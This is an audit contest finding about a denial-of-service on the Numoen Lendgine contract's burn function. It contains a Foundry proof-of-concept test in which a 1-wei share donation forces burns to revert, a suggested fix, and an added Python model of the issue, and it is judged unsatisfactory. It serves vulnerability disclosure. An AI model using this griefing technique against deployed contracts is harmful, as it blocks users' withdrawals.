code-423n4 / 2023-01-numoen-findings


A malicious user can make the function burn not work #188

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/code-423n4/2023-01-numoen/blob/2ad9a73d793ea23a25a381faadc86ae0c8cb5913/src/core/Lendgine.sol#L105-L120

Vulnerability details

Impact

A user can dedicate themselves to sending tokens to lendgine every time someone wants to call the function burn, causing a revert by InvariantError()

I marked this as a medium because it can be solved with adequate parameters at the moment of calling burn, but if the attacker is insistent it can be a high problem

Proof of Concept

test

  function testDoS() external {
    _deposit(address(this), address(this), 2 ether, 16 ether, 2 ether);
    _mint(cuh, cuh, 5 ether);
    _mint(dennis, dennis, 5 ether);

    // dennis sends 1 wei of lendgine shares to the lendgine contract itself
    vm.prank(dennis);
    lendgine.transfer(address(lendgine), 1);

    emit log("burn-");

    vm.startPrank(cuh);
    token0.approve(address(this), 0.5 ether);
    token1.approve(address(this), 4 ether);
    vm.stopPrank();

    // the burn now reverts with InvariantError()
    vm.expectRevert(Pair.InvariantError.selector);

    uint256 collateral2 = lendgine.burn(
      cuh,
      abi.encode(
        PairMintCallbackData({
          token0: address(token0),
          token1: address(token1),
          amount0: 0.5 ether,
          amount1: 4 ether,
          payer: cuh
        })
      )
    );
  }

result

Running 2 tests for test/BurnTest.t.sol:BurnTest
[PASS] testDoS() (gas: 540203)
Logs:
burn-

Tools Used

foundry

Recommended Mitigation Steps

It could be fixed by adding an equation that calculates the parameters in proportion to the value of the shares in the parameter of mint(liquidity, data);

https://github.com/code-423n4/2023-01-numoen/blob/2ad9a73d793ea23a25a381faadc86ae0c8cb5913/src/core/Lendgine.sol#L117
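As an added illustration of the mechanism the finding describes (not part of the original submission and not Numoen's code), the Python model below reduces the interaction to its accounting: burn reads the share balance sitting at the contract's own address, converts it to liquidity, and requires the caller to pay token0/token1 amounts that back that liquidity. A caller who precomputed amounts for the liquidity their own shares represent (the fixed amount0/amount1 in the PoC's callback data) fails the check once a third party has donated even 1 wei of shares, while a callback that derives the amounts from the liquidity value it is handed (the proportional computation the mitigation asks for) still passes. The 1:8 token ratio, the rounding rule, the share-to-liquidity conversion and all names and balances are constructed stand-ins, chosen only so that 5 ether of shares maps to the 0.5 ether / 4 ether pair used in the PoC.

```python
# Constructed model of the share-donation interaction described in the finding.
# This is an added illustration, not Numoen's code: the share-to-liquidity
# conversion, the pair invariant and the callbacks are simplified stand-ins.
from dataclasses import dataclass, field
from typing import Callable, Dict, Tuple

ETHER = 10 ** 18
LENDGINE = "lendgine"  # the contract's own address, whose share balance burn() reads

Callback = Callable[[int], Tuple[int, int]]


class InvariantError(Exception):
    """Stand-in for Pair.InvariantError(): the amounts paid in do not back the liquidity."""


def required_amounts(liquidity: int) -> Tuple[int, int]:
    """Stand-in invariant: liquidity must be backed by token0:token1 in a 1:8 ratio
    (0.5 ether / 4 ether per 5 ether of liquidity, as in the PoC), rounded up."""
    need0 = (liquidity + 9) // 10
    need1 = (8 * liquidity + 9) // 10
    return need0, need1


@dataclass
class Lendgine:
    total_supply: int                 # outstanding shares
    total_liquidity_borrowed: int     # liquidity those shares represent
    balances: Dict[str, int] = field(default_factory=dict)

    def transfer(self, sender: str, to: str, amount: int) -> None:
        if self.balances.get(sender, 0) < amount:
            raise ValueError("insufficient shares")
        self.balances[sender] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount

    def convert_share_to_liquidity(self, shares: int) -> int:
        return shares * self.total_liquidity_borrowed // self.total_supply

    def burn(self, callback: Callback) -> int:
        # As in the finding: the shares to burn are whatever sits at the contract's
        # own address, so anyone can change them with a plain transfer beforehand.
        shares = self.balances.get(LENDGINE, 0)
        liquidity = self.convert_share_to_liquidity(shares)
        if shares == 0 or liquidity == 0:
            raise ValueError("InputError")
        amount0, amount1 = callback(liquidity)      # caller pays token0/token1 back in
        need0, need1 = required_amounts(liquidity)
        if amount0 < need0 or amount1 < need1:
            raise InvariantError(f"paid {(amount0, amount1)}, need {(need0, need1)}")
        self.total_liquidity_borrowed -= liquidity
        self.total_supply -= shares
        self.balances[LENDGINE] = 0
        return liquidity


def fixed_amount_callback(precomputed_liquidity: int) -> Callback:
    """Pays amounts precomputed for the liquidity the caller expected, which is
    what fixed amount0/amount1 values in the callback data amount to."""
    amounts = required_amounts(precomputed_liquidity)
    return lambda _liquidity: amounts


def proportional_callback(_precomputed_liquidity: int) -> Callback:
    """The suggested mitigation: derive the amounts from the liquidity value
    actually passed to the callback, so a donated share cannot skew them."""
    return required_amounts


def run_burn(donation_wei: int, make_callback: Callable[[int], Callback]) -> int:
    """cuh burns 5 ether of shares after dennis donates `donation_wei` shares to
    the contract. Returns the liquidity burned, or raises InvariantError."""
    lg = Lendgine(total_supply=10 * ETHER, total_liquidity_borrowed=10 * ETHER,
                  balances={"cuh": 5 * ETHER, "dennis": 5 * ETHER})
    expected = lg.convert_share_to_liquidity(5 * ETHER)   # what cuh precomputes
    if donation_wei:
        lg.transfer("dennis", LENDGINE, donation_wei)       # the 1-wei donation
    lg.transfer("cuh", LENDGINE, 5 * ETHER)
    return lg.burn(make_callback(expected))


def burn_reverts(donation_wei: int, make_callback: Callable[[int], Callback]) -> bool:
    """True when the burn fails the invariant check under the given scenario."""
    try:
        run_burn(donation_wei, make_callback)
    except InvariantError:
        return True
    return False


if __name__ == "__main__":
    print("no donation, fixed amounts burned:", run_burn(0, fixed_amount_callback))
    print("1 wei donation, fixed amounts revert:", burn_reverts(1, fixed_amount_callback))
    print("1 wei donation, proportional amounts burned:", run_burn(1, proportional_callback))
```

The model makes the detection angle concrete as well: the precondition for the revert is a share balance at the contract's own address that the burner did not put there, so a transfer of lendgine shares to `address(lendgine)` from an unrelated account immediately before a burn is the event worth watching for.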

c4-judge commented 1 year ago

berndartmueller marked the issue as unsatisfactory: Insufficient quality